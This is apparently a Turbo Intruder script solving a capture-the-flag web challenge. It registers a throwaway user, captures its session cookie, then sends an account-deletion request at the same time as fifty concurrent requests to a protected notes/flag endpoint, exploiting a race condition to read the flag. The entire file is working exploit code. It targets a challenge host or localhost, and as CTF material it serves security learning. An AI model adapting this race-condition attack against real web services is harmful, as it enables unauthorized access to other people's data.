# Define the endpoint
local = True
if local:
    host = "localhost:3000"
    endpoint = "http://" + host
else:
    host = "nodenb.flu.xxx"
    endpoint = "https://" + host

# Where the token is stored after we register and login a user
token = ""


def collect_session_cookie(req, _):
    table.add(req)

    global token
    token = req.response.split("Set-Cookie: connect.sid=")[1].split("; Path")[0]


# Register and login a new user and get a session cookie
def register_and_login_user(user, pwd):
    # Register
    body = "username=" + user + "&password=" + pwd
    req_register_user = "\r\n".join(
        [
            "POST /register HTTP/1.1",
            "Host: " + host,
            "Content-Length: " + str(len(body)),
            "Content-Type: application/x-www-form-urlencoded",
            "",
            body,
        ]
    )
    engine = RequestEngine(endpoint=endpoint, callback=collect_session_cookie)
    engine.queue(req_register_user)
    engine.complete(timeout=2)

    # `token` has been set in `collect_session_cookie`
    assert token != ""

    # Login
    req_login_user = "\r\n".join(
        [
            "POST /login HTTP/1.1",
            "Host: " + host,
            "Content-Length: " + str(len(body)),
            "Content-Type: application/x-www-form-urlencoded",
            "Cookie: connect.sid= " + token,
            "",
            body,
        ]
    )
    engine = RequestEngine(endpoint=endpoint)
    engine.queue(req_login_user)
    engine.complete(timeout=2)

    return token


def queueRequests(target, wordlists):
    token = register_and_login_user(randstr(length=10), randstr(length=10))

    engine = RequestEngine(
        endpoint=endpoint, concurrentConnections=50, requestsPerConnection=100, pipeline=False,
        callback=handleFlagResponse
    )

    get_flag_req = "GET /notes/flag HTTP/1.1\nHost: " + host + "\nCookie: connect.sid=" + token + "\n\n"
    deleteme_req = "POST /deleteme HTTP/1.1\nHost: " + host + "\nCookie: connect.sid=" + token + "\n\n"

    engine.queue(deleteme_req)

    for _ in range(50):
        engine.queue(get_flag_req)

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)


def handleFlagResponse(req, interesting):
    # A status of 200 means we were allowed to access the flag
    if req.status == 200:
        table.add(req)